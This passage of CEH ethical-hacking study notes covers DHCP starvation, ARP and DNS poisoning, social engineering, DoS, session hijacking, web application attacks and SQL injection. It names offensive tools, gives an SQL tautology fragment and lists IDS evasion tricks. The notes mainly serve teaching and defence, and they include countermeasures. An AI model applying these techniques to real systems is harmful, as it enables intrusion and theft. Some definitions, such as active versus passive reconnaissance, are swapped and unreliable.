parameters. 48 | 4. Finally, the DHCP server send the **DHCP-Acknowledgement** packet containing configuration parameters. 49 | 50 | | CLIENT | | DHCP SERVER | 51 | |:----------------------:|:--:|:----------------------:| 52 | | DHCP-Discovery | -> | | 53 | | | <- | DHCP-Offer | 54 | | DHCP-Request | -> | | 55 | | | <- | DHCP-Acknowledgement | 56 | 57 | - **IPv4 Ports**: 58 | - UDP port 67 for Server 59 | - UDP port 68 for Client 60 | ----------------------------------------------- 61 | - **IPv6 Ports**: 62 | - UDP port 546 for Client 63 | - UDP port 547 for Server 64 | 65 | # DHCP Starvation Attack 66 | DHCP Starvation Attack is a Denial-of-Service attack on a DHCP server. Attacker send bogus requests to DHCP server with spoofed MAC address to lease all IP address in DHCP address pool. Once all IP address is allocated, upcoming users will be unable to obtain IP address or renew the lease. 67 | 68 | # Rogue DHCP Server 69 | Attacker deploy the rogue DHCP server in the network along with the DHCP starvation attack. When legitimate DHCP server is in Denial-of-Service attacks, DHCP clients are unable to gain IP address from the legitimate DHCP server. Upcoming DHCP Discovery (IPv4) and Solicit (IPv6) are replied by the bogus DHCP server with configuration parameter which directs the traffic towards it. 70 | -------------------------------------------------------------------------------------------------------------- 71 | # ARP Poisoning 72 | # Address Resolution Protocol (ARP) 73 | The Address Resolution Protocol (ARP) is a communication protocol used for discovering the link layer address, such as a MAC address, associated with a given internet layer address, typically an IPv4 address. 74 | 75 | # ARP Spoofing Attack 76 | Attacker send forged ARP packets over Local Area Network (LAN). In this case, switch will update the attacker's MAC address with the IP address of a legitimate user or server, then start forwarding the packets to the attacker. Attacker can steal information by extracting it from packets. 77 | ARP Poisoning used for: 78 | - Session hijacking 79 | - Denial-of-Service attacks 80 | - Man-in-the-Middle attacks 81 | - Packet sniffing 82 | - Data interceptions 83 | - VoIP tapping ---> VOICE OVER IP 84 | - Stealing passwords 85 | -------------------------------------------------------- 86 | # Spoofing Attacks 87 | # MAC Spoofing/Duplicating 88 | Manipulating the MAC address to impersonate the legitimate user or launch attack such as DoS. 89 | Attacker sniffs the MAC address of users which are active on switch ports and duplicate the MAC address. 90 | This can intercept the traffic and traffic destined to the legitimate user may direct to the attacker. 91 | 92 | # DNS Poisoning ---> WEB CACHE Poisoning 93 | 94 | # Domain Name System (DNS) 95 | - DNS is used in networking to translate human-readable domain names to IP address. 96 | - When DNS Server receives the request, it doesn't have the entry, it generates the query to another DNS Server for the translation and so on. 97 | - DNS server having the translation will send back the IP address. 98 | 99 | # DNS Cache Poisoning 100 | Attacker exploiting flaws in DNS software, adds or alter the entries. 101 | 102 | ------------------------------------------------------------------------------------------------------------ 103 | ------------------------------------------------------------------------------------------------------------ 104 | # Wireshark 105 | Filters in Wireshark: 106 | - `==` Equal 107 | - `eq` Equal 108 | - `!=` Not equal 109 | - `ne` Not equal 110 | - `contains` Contains specified value 111 | - ip.src source addresses 112 | - ip.dst destin addresses 113 | - ip.addr Match at both the places (source and destin) 114 | -------------------------------------------------------------------------------------------------------------- 115 | # Sniffing Countermeasures 116 | - Use Secure Protocol instead of base Protocols (HTTPS over HTTP, SFTP over FTP, etc) 117 | - Switch instead of Hub (Hub broadcast packet by default, but Switch does not) 118 | - Strong encryption protocol (Strong Encrypted data is secure to transmit over any type of network) 119 | -------------------------------------------------------------------------------- /Module 09 - Social Engineering/09_Social_Engineering.md: -------------------------------------------------------------------------------- 1 | # Basic 2 | **Social engineering is an act of stealing information from humans. Its a mind manipulation technique.** 3 | - No interaction with target system or network 4 | - Non-technical attack 5 | - Convincing the target to reveal information 6 | - One of the major vulnerability which leads to this type of attack is **Trust**. 7 | - User trust in another user and does not secure their credentials from them. 8 | - Employees are uneducated at organizations, so this is a major vulnerability. 9 | - Lack of security policies and privacy are also vulnerable. 10 | 11 | # Phases in Social Engineering 12 | **Research** 13 | - Collection of information from the target organization 14 | - Collected by dumpster diving, scanning, search on the internet, ... 15 | **Select target** 16 | - Select the target among other employees 17 | - A frustrated target is more preferred 18 | **Relationship** 19 | - Create relationship with the target 20 | - Earn the trust 21 | **Exploit** 22 | - Collecting sensitive information such as usernames, password, etc... 23 | 24 | # Types of Social Engineering - SE Attacks 25 | **Human-based Social Engineering - SE** 26 | One-to-one interaction with the target. Earn the trust to gather sensitive information from the target. 27 | ***Impersonation*** 28 | - Pretend to be something or someone, pretending to be a legitimate user or authorized person. 29 | - Impersonation is performed by identity theft. 30 | ***Eavesdropping and Shoulder Surfing*** 31 | - Eavesdropping is a technique in which attacker is revealed information by listening to the conversation. 32 | - Reading or accessing any source of information without being notified. 33 | - Shoulder Surfing is a method of gathering information by standing behind the target. 34 | ***Dumpster Diving*** ---> 35 | - Looking for treasure in trash. 36 | ***Piggybacking and Tailgating*** 37 | - Piggyback is a technique in which attacker waits for an authorized person to gain entry in a restricted area. 38 | - Tailgating is a technique in which attacker gains access to the restricted area by following the authorized person. 39 | 40 | **Computer-based Social Engineering** 41 | ***Phishing*** 42 | Attacker send fake emails which looks like legitimate email, they're sent to hundreds, sometimes thousands, of recipients. When recipient opens the link, he is enticed for providing information. Attacker use IDN Homographic Attack (International Domain Name), In this attacker use Crylic script to register domain name and create fake website similar to actual website. 43 | ***Spear Phishing*** ---> 44 | Similar as phishing but it is focused on one target. Because of this, it is generate higher response rate. 45 | 46 | **Mobile-based Social Engineering** 47 | ***Publishing Malicious Apps*** 48 | These applications are normally a replica or similar copy of a popular application. 49 | ***Repackaging Legitimate Apps*** 50 | Repack a legitimate app with a malware. 51 | 52 | **Insider Attack** ---> 53 | Social Engineering is not all about a third person gathering information, it may be an insider with privileges. 54 | 55 | **Impersonation on Social Network Sites** 56 | ***Social Engineering Through Impersonation on Social Network Sites*** 57 | Attacker gathers personal information of a target from different sources mostly from social network sites such as full name, date of birth, email address, residential address, etc. 58 | After gathering the information, the attacker create an account that is exactly the same. Then introduced to friends, group joined by the target to get updates or convince the target's friends to reveal information. 59 | ***Risks of Social Network in a Corporate Networks*** 60 | Social network sites is not secured enough as a corporate network secures the authentication. 61 | The major risk of social network is its vulnerability in the authentication. 62 | The employee while communicating on social network may not take care of sensitive information. 63 | 64 | **Identity Theft** 65 | - Stealing the identification information of someone 66 | - Popularly used for frauds 67 | - Prove the fake identity to take advantage of it 68 | 69 | # Countermeasures 70 | **Secure sensitive data** 71 | Store Data at rest in a secure manner (Use Encryption or Salted Hashing). Don't share Sensitive info/Documents with everyone. 72 | **Physical security** 73 | Who has access to Physical records (Data), who has access to sensitive areas (Server room, Admin block, Data Centres), and how you ensure that Physical security. 74 | **Least privileges** 75 | Assign least Privileges to Employees/User. 76 | **Strong policies** 77 | Password Policies, Access Policies, Device Controls, etc. 78 | **Training** 79 | Train your Employees for popular and new S.E Attacks. 80 | **Bio-metric authentication** 81 | Use Biometric authentication for Access and Entry Records. 82 | **Audit** 83 | Regular Internal Audits and External Audits 84 | 85 | # Tools 86 | - BlackEye - https://github.com/x3rz/blackeye 87 | - SET (Social Engineering Toolkit) 88 | -------------------------------------------------------------------------------- /Module 1 :-: Introduction.md: -------------------------------------------------------------------------------- 1 | # K1). Information Security Triangle or CIA Trait and Non-Repudiation 2 | - Confidentiality 3 | - Confidentiality Ensures that Information is only accessible by right person i.e. only Authorized person can see the information. Protection from unauthorized access. Confidentiality is ensured by implementing Authentication Checks (User Name and Password), Captcha (Mitigate Brute-force and prevent from Bots), etc. Confidential info should be stored in private offline storage and keep in a safe place, or encrypt data if possible. 4 | - Popular attacks affecting confidentiality : Data Breaches, Card Skimming, Keylogging, Phishing, Dumpster Diving, etc. 5 | - Integrity 6 | - Integrity Ensures that Information can only tempered by Authorized by person or it should not be tempered by unauthorized person. Info. either in rest or transit should not be tempered. Integrity is ensured by Encryption, double-triple Encoding, Hashing, salted hashing, MAC (Message Authentication Code), or we can say with the help of Cryptography. 7 | - Popular Attacks affecting Integrity : MITM, Packet sniffing, etc 8 | - Availability 9 | - Availability ensures that Info. is only available to the right person at the right time, i.e. whenever the info. is requested it should be available. 10 | - Popular Attacks Affecting Availability : DOS, DDOS, etc. 11 | - Non-Repudiation 12 | - Non-Repudiation ensures that Person A or Person B can't deny for action performed or happened on there side. For Example, suppose Person A send Money to Person B, so person B can't say money was never received. Like we have proof (Bank Statement, Account Balance Increment, Balance Deduction on Person A's side). 13 | 14 | - FireEye Data Breach --> https://malicious.life/episode/episode-101/ 15 | - Stuxnet --> https://malicious.life/episode/episode-7-stuxnet-part-1/ 16 | 17 | # K2). Different Hackers 18 | - White Hat/Ethical Hackers --> Bug Hunters, Penetration testers, Hacking with legal contracts. 19 | - Black Hat --> Cyber Terrorists, Suicide Hackers, hacking with bad intensions. 20 | - Grey Hat --> Sometime work for offenses and sometime for defences. 21 | - Script Kiddies --> New in the field of Cyber Security, Use Past Exploits, use open pre-developed - scripts to perform tasks. 22 | - State Sponsored Hackers --> Hired by Government to gain Top Secrets of other countries. 23 | 24 | # K3). Types of Penetration Testing 25 | - White Box Testing --> You will get the complete details about system from client like Network access, login ID-Password, etc. 26 | - Black Box Testing --> You have to enumerate as much as possible by your own. 27 | - Grey Box Testing --> You will get only little details like network access. 28 | 29 | # K4). Teams in Penetration Testing 30 | - Red Team --> Perform like an Hacker and try to hack into Computer Systems, physical Security, Network Security, etc 31 | - Blue Team --> Act as a Defender, and implement necessary security checks to ensure System Security. Also react on Red team's Actions/Attacks. Blue team also work as Incident Response team. 32 | 33 | # K5). Few Terms used in Hacking 34 | - Vulnerability - Know Security Flaw which can be used to compromise CIA trait. 35 | - Payload - This is the Malicious Script, used to perform malicious activity. 36 | - Exploit - Exploit is the combination of Vulnerability and Payload. 37 | - Zero Day - These are Vulnerabilities unknown to developer or not previously disclosed in public. 38 | - Deep Web & Dark web: 39 | - Deep Web - is the space where Spiders and Crawlers are not allowed. for example : Facebook.com/abc is accessible to spiders and crawlers but messages sent ABC to XYZ is only accessible or visible to ABC and XYZ. i.e. not visible through public search engines or not visible publicly. 40 | - Dark Web - Dark web is a part of internet which is only accessible through TOR (The Onion Routing) Browser. These sites have special Top level Domain (TLD) Names '.onion'. For Example: 46787sd6fasdf69756g79aas6df96asd.onion, abc.onion --> 41 | 42 | # K6). Information Security Threat Categories : (Optional) 43 | Network Threats: Like 44 | - MITM - Man In The Middle - Hacker sit between client and Source 45 | - DOS - Denial of Service - Sending tons of junk packets to disturb server so that server was not able to respond authentic requests. 46 | - PASSWORD BASED ATTACKS - Default passwords, Brute Force, Dictionary ATTACKS 47 | Host Threats: Like 48 | - Unauthorized Access - Gaining Access without permission 49 | - Physical Security Threats - Open Access, Visible WiFi Routers 50 | Operation Security Threats: Like 51 | - Unpatched OS \ Insecure OS 52 | - Zero Days 53 | 54 | # K8). Phases of Hacking or how to successfully hack into system 55 | - Reconnaissance 56 | Active = Acquiring Info without interacting with Target Directly. 57 | Passive = Gain Info by Acquiring the target Directly. (Via Calls, Emails, help Desk or Technical Department) 58 | - Scanning 59 | Scan IP's for Open Ports and Possible Vulnerabilities like Older version of OS, Running Services . 60 | - Gaining Access 61 | Attacker Gain Access by found Vulnerabilities in Scanning Phase (By Password Cracking, Insecure Authentication, Buffer Overflow, Etc) 62 | - Maintaining Access 63 | Maintain Access by Creating backdoor, installing Rootkit, Trojan, etc) 64 | - Clearing Traces/Logs 65 | Clear Footprints like connection established, Activities performed) Clear Date defining Hackers Identity 66 | 67 | # K9). Some information Security Standards: How Organizations prove there Security --> By Auditing. 68 | - PCI-DSS - Payment Card Industry - Data Security System --> Security Checks how Payment Card info should be stored and what are the security checks to keep in mind. 69 | - HIPAA - Health Insurance Portability and Accountability Act --> How employee or client Health related Info is stored, and Security Checks to maintain CIA Trait. 70 | - ISO 27000 --> ISO 27000 is a family of Standards defining security standards to be implemented in Organizations. 71 | -------------------------------------------------------------------------------- /Module 10 - DOS and DDOS/10_Denial_of_Services.md: -------------------------------------------------------------------------------- 1 | # Basic 2 | Denial-of-Service is type of attack on which service offered by a system or a network is denied/unavailable. Service may either be denied, reduce the functionality or prevent the access. 3 | 4 | # Symptoms of DoS attack: 5 | - Slow performance 6 | - Increase in spam email --> SMTP 7 | - Unavailability of a resource 8 | - Loss of access to a website 9 | - Disconnection of a wireless or wired internet connection 10 | - Denial of access to any internet services 11 | 12 | # Distributed Denial of Service (DDoS) 13 | - In DDoS, multiple compromised systems are involved to attack a target. 14 | - The attacker send several connection request to the server with fake return address, so the server can't find a user to send the connection approval. 15 | - The authentication process waits for a certain time to close the session. 16 | - The attacker is continuously sending requests which causing a number of open connection on the server that lead to a denial of service. 17 | 18 | # Categories of DoS/DDoS Attacks 19 | **Volumetric Attacks** 20 | Denial of Service attack performed by sending a high amount of traffic towards the target. 21 | Volumetric attack are focused on overloading the bandwidth capability. 22 | **Fragmentation Attacks** 23 | DoS attacks witch fragment the IP datagram into multiple smaller size packets. 24 | It requires to reassembly at the destination which requires resources of routers. 25 | **TCP-State-Exhaustion Attacks** 26 | TCP-State-Exhaustion Attacks are focused on web servers, firewalls, load balancers and other infrastructure component to disrupt connections by exhausting their finite number of concurrent connections. 27 | Most common state-exhaustion attack is ping of death. 28 | 29 | # DoD/DDoS Attack Techniques 30 | **Bandwidth Attacks - DDoS** 31 | Bandwidth attack requires multiple sources to generate requests to overload the target. 32 | The goal is to consume the bandwidth completely. 33 | Zombie servers or Botnets used to perform this type of attack. 34 | **Service Request Floods** 35 | Attacker flood the request towards a web service or server until it is overloaded. 36 | **SYN Attack / Flooding** 37 | The attacker sending a lot of SYN request to tying up a system. 38 | The victim waits for the acknowledgement from the Attacker, but Attacker never send the acknowledgement. 39 | This waiting period ties up a connection "listen to queue", that can tie up for 75 seconds. 40 | **ICMP Flood Attack - Ping of Death** 41 | Flooding ICMP request without waiting for the response overwhelm the resource of the network device. 42 | **Permanent DoS Attack (PDoS)** 43 | Permanent DoS attack is focused on hardware sabotage, cause irreversible damage to the hardware. 44 | Affected hardware require replacement or reinstall the software. 45 | **Distributed Reflection Denial of Service (DRDoS)** 46 | Attacker uses an intermediary victim which redirect the traffic to a secondary victim. 47 | Secondary victim redirects the traffic to the target. 48 | The intermediary and secondary victim is used for spoofing the attack. 49 | **Botnet** 50 | Attacker compromises victims to make bot, which compromise other system to create a botnet. 51 | These botnets are controlled by **Command and Control server** owned by the attacker. 52 | This server is used to send instructions to perform the attack. 53 | 54 | # Tools 55 | - Ping command 56 | - Nmap DOS Script 57 | - Hping3 58 | - LOIC - Low Orbit Ion Cannon 59 | - MSF Auxiliary 60 | - Hulk - Github 61 | 62 | # Preventive Measures 63 | - Use Load Balancers. 64 | - Protect your network with Network Firewall. -- IDS / IPS 65 | - Implement Web Application Firewall. 66 | - Take Help from Cloud, they have more bandwidth than an enterprise would, which can help in large volumetric attacks. 67 | -------------------------------------------------------------------------------- /Module 11 - Session Hijacking/Session Hijacking.md: -------------------------------------------------------------------------------- 1 | # Session Hijacking - Session Hijacking is the process of taking control of an active session over active User. 2 | -------------------------------------------------------------------------------- 3 | # What is a Sessions ID 4 | -> After Validating user with on basis of username and password, server assign him a string value called **Session ID** 5 | -> These Session ID's are used to identify USERs. 6 | -> After Validating user's credentials a fresh Session ID is assigned to User Every time. 7 | -> This Session ID is Stored in Form of Cookies on User's Browser. 8 | -------------------------------------------------------------------------------- 9 | # Cookies 10 | -> Cookies are the values which help server to validate requests for each user or session 11 | -> Cookies Contain User Identity Details, Personalization, and other information used to identify user and computer on network. 12 | -------------------------------------------------------------------------------- 13 | # Cookie vs Tokens 14 | - Cookies -> Cookies are stored on Both Server Side and Client Side. 15 | Cookies are just String Values that are validated by comparison. 16 | - Tokens -> Tokens are Stored on Client Side only. 17 | Normal JWT (JSON Web Token) comprised of **Header.Payload.Signature** 3 concatenated Base64url-encoded Strings, separated by (.) 18 | -------------------------------------------------------------------------------- 19 | # Session Hijacking Concept 20 | -------------------------------------------------------------------------------- 21 | # Why Session Hijacking Works 22 | -> Insecure Session Handling 23 | -> Insecure Session Termination 24 | -> Weak Session ID generation algorithms - linear algo. used such as time or IP address for generating session ID. 25 | -> Unencrypted Session ID's 26 | ---------------------------------------------------------------------------------- 27 | # Types of Session Hijacking 28 | - Active -> In Active Session Hijacking, Attacker steal Session Cookies from victim's Browser and use those cookies. Also known Application-Level Hijacking. 29 | - Passive -> A passive Attack uses sniffers on the network, allowing attacker to obtain info. to log on as a valid user and enjoy the privileges. Also called Network-Level Hijacking. 30 | ---------------------------------------------------------------------------------- 31 | # Methods to obtain Session ID 32 | -> Predict Session 33 | -> MITM = Man In The Middle Attack 34 | -> MITB = Man In The Browser Attack => Hijack Victims Browser - BeEF 35 | -> Network Sniffing 36 | -> Malware Attack 37 | -> XSS = Cross-Site Scripting => Executing Malicious Script to fetch User Cookies, when Victim Browse a Website script executes and Attacker get Session ID. 38 | -> Proxy Server => Attacker user their System as a Proxy Server for Victim so that all the traffic pass through their machine, and they can extract juicy info from requests and responses. 39 | ---------------------------------------------------------------------------------- 40 | # Session Hijacking vs Spoofing 41 | - Spoofing -> In Spoofing, Attacker Steal User Credentials and initiate a new session. 42 | - Hijacking -> In Hijacking, Attacker Steal Active Session ID's and Use those Session ID's. 43 | ---------------------------------------------------------------------------------- 44 | # Session Related Attacks 45 | -> IDOR -> Insecure Direct Object Reference => Attacker Modify Session ID's to gain access over other active Session. Attacker do this by analyzing the Session ID's format. 46 | -> Session Fixation Attack 47 | => Vulnerability => Session ID is assigned before validating user credentials. 48 | => Session ID is not modified after validating user Credentials. 49 | => How Attacker Exploit => Attacker Open the website, and copy session ID(12345678) from there, and send URL with this Session ID to victim. 50 | => when Victim open and validate the credentials, then server consider requests with that session ID(12345678) as Actual User's request. 51 | => After user login, Attacker simply refresh the page and in response server send actual users details. 52 | -> Browser Back Attack 53 | => Vulnerability => Session is not expired from server side after user logout. 54 | -> Cookie Replay Attack 55 | => Vulnerability => Cookies from last Session can be used to initiate new Sessions. 56 | ---------------------------------------------------------------------------------- 57 | # Session Hijacking Tools 58 | -> Burp Suite 59 | -> OWASP ZAP 60 | -> Bettercap 61 | -> SSL Strip 62 | -> DroidSheep 63 | -> Droidsniff 64 | -> Faceniff 65 | ---------------------------------------------------------------------------------- 66 | # Protection Against Session Hijacking 67 | -> Use SSH to create secure communication Channel 68 | -> Pass Authentication cookie over HTTPS Connection 69 | -> Generate Session ID After Verifying credentials 70 | -> Use Encryption Over Data and cookies 71 | -> Use Lengthy Session-ID's 72 | -> Set Low Timeout for session expiration 73 | -> Use Strong Authentication like Kerbros 74 | -> Check Website Certificates 75 | -> Use Secure Protocol 76 | ---------------------------------------------------------------------------------- 77 | -------------------------------------------------------------------------------- /Module 12 - Evading IDS, Firewall and HoneyPots/Module 12 - IDS, FIREWALL AND HONEYPOTS.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SNGWN/CEH-Notes/b456452938ea58dfaa7cbbfa1cbd33e641374b37/Module 12 - Evading IDS, Firewall and HoneyPots/Module 12 - IDS, FIREWALL AND HONEYPOTS.pdf -------------------------------------------------------------------------------- /Module 13 - Hacking web Servers/13_Hacking_Web_Servers.md: -------------------------------------------------------------------------------- 1 | # Web Server 2 | Web Servers are the programs that are used for hosting services. 3 | Web Servers are deployed on a separate web server hardware or installed on a host as a program. 4 | It delivers content over **Hyper Text Transfer Protocol** (HTTP). 5 | Web Servers support different types of application extensions whereas all of the support **Hypertext Markup Language** (HTML). 6 | 7 | # Web Server Security Issue 8 | Web server vulnerabilities: 9 | - Improper permission of file directories 10 | - Default configurations 11 | - Enabling unnecessary services 12 | - Lack of security 13 | - Bugs 14 | - Misconfigured SSL certificate - Drown Attack 15 | - Enabled debugging 16 | 17 | # Open Source Web Servers 18 | - Apache HTTP Server 19 | - Nginx 20 | - Apache Tomcat 21 | 22 | # Web Server Attacks 23 | # DoS/DDoS 24 | # DNS Server Hijacking 25 | 26 | # Directory Traversal Attacks 27 | Attacker using trials and error method to access restricted directories to reveal sensitive information. 28 | 29 | # Man-in-the-Middle / Sniffing Attacks 30 | # Phishing Attacks 31 | # Website Defacement 32 | After a successful intrusion, attacker alters and modify the content of the website. 33 | # Webserver Misconfiguration 34 | Attacker looks for misconfigurations and vulnerabilities to exploit. 35 | # Web Cache Poisoning Attack 36 | The attacker wipe the actual cache of the webserver and sending crafted request to store fake entries. 37 | 38 | # Web Application Attacks 39 | - Cookie Tampering 40 | - DoS 41 | - SQL Injection 42 | - Session Hijacking 43 | - Cross-Site Request Forgery (CSRF) 44 | - Cross-Site Scripting (XSS) 45 | - Buffer Overflow 46 | 47 | # Attack Methodology 48 | # Information Gathering 49 | Collecting information from internet. 50 | # robots.txt 51 | Attacker extract information about internal files. 52 | # Web Server Footprinting 53 | Results the server name, type, OS, applications, etc. 54 | 55 | # Mirroring a website 56 | Download the website, to inspect offline, without any interaction to the target. 57 | Tool: 58 | - httrack 59 | - Wget - wget --mirror 60 | 61 | # Vulnerability Scanning 62 | Automated tool to inspect website and detect vulnerabilities. 63 | These tools perform deep inspection of scripts, open ports, banners, etc. 64 | Tools: 65 | - owasp-zap 66 | - openvas 67 | - Nessus 68 | - Qualys 69 | - Crash Test 70 | - burpsuite Pro 71 | 72 | # Hacking Web Passwords 73 | Extract passwords to gain authorized access to the system. 74 | Password may be get from social engineering, tampering the communication, etc. 75 | 76 | # Countermeasures 77 | - Place web server in a secure zone (behind firewall, IDS, IPS, DMZ) 78 | - Detect potential changes (hashing, script to detect change) 79 | - Disable insecure and unnecessary ports 80 | - Using port 443 (HTTPS) over port 80 (HTTP) 81 | - Encrypted traffic 82 | - Software update 83 | - Disable default account 84 | 85 | # Patch Management 86 | **Patch Management** is an automated process to detect missing security patches, find out solutions, download patch, test the patch in an isolated environment then deploy the patch onto the systems. 87 | -------------------------------------------------------------------------------- /Module 14 - Web Application/14_Hacking_Web_Applications.md: -------------------------------------------------------------------------------- 1 | ## Terminology 2 | **Web Applications** are that applications that is running on a remote application server and available for clients over the internet. 3 | **Server Administrators** are responsible for the web server's safety, speed, functioning and performance. 4 | **Application Administrators** are responsible for the management and configuration required for the web 5 | application. 6 | **Clients** are the endpoints which interact with the web application / server. 7 | 8 | ## How Web Applications work? 9 | **Front-end** <-> **Back-end** 10 | Users are interacting with the front-end. 11 | The processing was controlled and processed by the back-end. 12 | 13 | # Server-side languages: 14 | - PHP - Hypertext Processer 15 | - Java 16 | - C# - C-Sharp 17 | - Python 18 | - JavaScript 19 | - many more... 20 | 21 | # Client-side languages: 22 | - CSS - Cascading Style Sheet 23 | - JavaScript 24 | - HTML 25 | 26 | # Web Application Threats 27 | - **Insecure storage** - sensitive data is stored on client side in plain text. 28 | - **Information leakage** - Sensitive Data is leaked unintentionally 29 | - **Directory traversal** - end user is able to traverse server's directory 30 | - **Parameter/Form tampering** - Modify Parameter value 31 | - **DOS attack** 32 | - **Buffer overflow** - Flood Server Buffer with junk and inject payload 33 | - **SQL injection** - Inject SQL Query through Parameter Fields or URL 34 | - **Cross-site Script** - Inject JavaScript or PHP script 35 | - **Security misconfiguration** - misconfigured server (Default account, unwanted services, Default passwords, debugging enabled, insecure exception handling) 36 | - **Broken session management** 37 | - **Session hijacking** 38 | 39 | # Invalidated input - Attack through User INPUT 40 | Process an non-validated input from the client to the back-end. This is a major vulnerability, this is the basics of injection attacks (SQL injection, xss, buffer overflow). 41 | 42 | # Parameter / Form Tampering 43 | Parameter tempering is an attack, where the attacker manipulate the parameter while client and server are communicating with each other. Parameters such as **Uniform Resource Locator** (URL) or web page form fields are modified (cookies, HTTP Header, form fields). 44 | 45 | # SQL Injection 46 | Injection of malicious SQL queries. 47 | Attacker can manipulate the database 48 | These vulnerabilities can be detected by using an automated scanner. 49 | 50 | # DoS Attack 51 | - **User Registration DoS** : an automated process, the attacker keep registering fake accounts. 52 | - **Login DoS** : attacker keep sending login requests. 53 | - **User Enumeration** : attacker brute force login credentials with a dictionary attacks. 54 | - **Account Lock** : attacker attempt to lock the user account by attempting invalid passwords. 55 | 56 | # Web Application Hacking Methodology 57 | # Analyze Web Application 58 | - Observing functionality 59 | - Identify vulnerabilities, entry points, servers 60 | - HTTP request analyze 61 | - Hidden content discovery - Directories, Subdomain, parameters 62 | ************************************************************************************** 63 | # Attack Authentication 64 | Exploit the authentication mechanism: 65 | - Username enumerate 66 | - Cookie exploitation 67 | - Session attacks 68 | - Password attacks 69 | **----------------------------------------------------------------------------------** 70 | # Session Management Attack 71 | 1. Impersonate a legitimate user. - Spoofing 72 | 2. Session hijacking techniques: - Cookie Stealing 73 | - Session token prediction 74 | - Session token tampering - IDOR - INSECURE DIRECT OBJECT REFERNCE 75 | - Session replay 76 | 77 | # Injection Attacks 78 | Inject malicious code, commands and files. 79 | Techniques: 80 | - Web Script injection - Injecting PHP, HTML or other languages scripts 81 | - OS Command injection - Inject OS command 82 | - SQL injection - Inject SQL Query 83 | - Buffer Overflow - Inject JUNK and PAYLOAD for Buffer Overflow attack 84 | **----------------------------------------------------------------------------------** 85 | # Countermeasures 86 | **-------------** 87 | # Percent Encoding 88 | [Percent Encoding](https://en.wikipedia.org/wiki/Percent-encoding) or URL Encoding is a technique for 89 | secure handling of URL by replaces unsafe and non-ascii characters with % followed by two hexadecimal 90 | digits. 91 | Example: 92 | **%20 or + both are used for SPACE** 93 | 94 | In URL:, there are some reserved character such as '/' that is used to separate paths in URL. To use this not as separator, then it must be encoded. 95 | **%2F used for '/'** 96 | 97 | - **Full list of percent encoded characters** 98 | [here](https://www.degraeve.com/reference/urlencoding.php) 99 | 100 | # HTML Encoding - HTML Encoding specify how special character will shown. 101 | **----------------------------------------------------------------------------------** 102 | # SQL Injection Countermeasures 103 | - Input validation 104 | - Customized error messages 105 | - Monitoring database traffic 106 | - Limit length of user input 107 | 108 | # XSS Attack Countermeasures 109 | - Testing tools 110 | - Filtering output 111 | - Validated INPUT 112 | 113 | # Other Countermeasures 114 | - Dynamic testing - Testing through Automated Tools 115 | - Source Code analysis - Analyze source code 116 | - Strong cryptography - Use Strong Encryption and Hashing Algorithms 117 | - Use TLS over SSL - Use TLS 1.3, TLS 1.2 over deprecated version of TLS 1.1 or SSL 118 | - Cookie timeout 119 | **----------------------------------------------------------------------------------** 120 | **----------------------------------------------------------------------------------** 121 | # OWASP Top 10 122 | 1. **Injection** -> Inject Malicious command, Scripts, Queries, etc. 123 | 2. **Broken Authentication** 124 | 3. **Sensitive Data Exposure** 125 | 4. **XXE (XML External Entity)** -> Vulnerable when XML data from Untrusted source is processed. 126 | 5. **Broken Access Control** 127 | 6. **Security misconfiguration** 128 | 7. **Cross-Site Scripting** -> Executing Java Script, PHP or any Language code on Victim Side is known as Cross-Site Scripting. 129 | 8. **Insecure Deserialization** -> Deserialization is the reverse process where the byte stream is used to recreate the actual Java object in memory. 130 | 9. **Using Component With Known vulnerability** 131 | 10. **Insufficient Logging and Monitoring** 132 | **----------------------------------------------------------------------------------** 133 | **----------------------------------------------------------------------------------** 134 | -------------------------------------------------------------------------------- /Module 15 - SQL Injection/15_SQL_Injection.md: -------------------------------------------------------------------------------- 1 | # Terminology 2 | The intention of SQL injection is to reveal or manipulate sensitive information from the database by injecting commands into existing queries. 3 | - Bypassing authentication 4 | - Revealing sensitive information 5 | - Compromise data integrity 6 | - Erase database 7 | 8 | # Tools 9 | - sqlmap 10 | 11 | # SQL 12 | **SQL** stands for **S**tructured **Q**uery **L**anguage. 13 | 14 | # Types of SQL Injection 15 | # **In-Band SQL Injection** 16 | Use the same communication channel to launch the attack and get the result. 17 | # **Error Based SQL Injection** 18 | - Server throw an error message 19 | - Error message is useful during the development, but should be disabled it when the application is live 20 | 21 | # Techniques to perform SQL Injection 22 | - End of line comment - Comment out the Rest Query by using Comment Techniques. 23 | - Illegal / Logically incorrect query - Send an incorrect 24 | - Tautology (something that is inherently true, like " OR 1=1") 25 | 26 | # Union SQL Injection 27 | Involves the **UNION** SQL operator, to combine the queries. 28 | **Select the `password` from `table1` and `table2` using UNION:** 29 | 30 | SELECT password FROM table1 31 | UNION 32 | SELECT password FROM table2 33 | 34 | # Inferential SQL Injection 35 | - Known as **Blind SQL Injection** 36 | - No data is transferred from the via the application, the attacker sending payloads, then observe the web application's response and behavior. 37 | 38 | # Boolean-based Blind SQL Injection 39 | Sending an SQL query to the database which send a different result depending on whether the query returns TRUE 40 | or FALSE result, the HTTP response will change or remain the same. 41 | 42 | This type of attack is slow, attacker need to enumerate the database, character by character. 43 | 44 | # Time-based Blind SQL Injection 45 | Attacker send a query, force the database to wait for a specified time before respond. 46 | The respond time indicate that the query TRUE or FALSE. 47 | 48 | # Out-of-band SQL Injection 49 | Depends on the features allowed on the database server (DNS, HTTP request), so not a very common attack. 50 | 51 | Use different channel to launch the attack. 52 | 53 | # SQL Injection Methodology 54 | # Information Gathering And Vulnerability Detection 55 | 56 | - Collect the information about the web application, server, OS, database, ... 57 | - Identify vulnerabilities 58 | - Evaluate input fields 59 | 60 | ### Launch Attack 61 | 62 | - Select the appropriate type of SQL Injection, based on the gathered information 63 | 64 | ## Advanced SQL Injection 65 | 66 | - Enumerate the database (Postgre, MySQL, Oracle, ...) 67 | - Identify privilege level of users 68 | - Passwords and hashes grabbing 69 | - Transfer database to a remote machine 70 | 71 | ## Evasion Techniques 72 | 73 | ### Evading IDS 74 | 75 | - Inserting inline comment in between keywords 76 | - Character encoding 77 | - String Concatenation 78 | - Obfuscated codes 79 | - Manipulating white spaces 80 | - Hex encoding 81 | - Sophisticated matches 82 | 83 | ## Countermeasures 84 | 85 | - Penetration testing (manual, with tool) 86 | - Source code analysis 87 | - Wep Application Firewall (WAF) 88 | - Remove debugging messages 89 | - Database account with minimal privileges 90 | - Input validation 91 | - Filter data 92 | - Customize error messages 93 | - IDS 94 | -------------------------------------------------------------------------------- /Module 16 - Wireless Networks/16_Hacking_Wireless_Networks.md: -------------------------------------------------------------------------------- 1 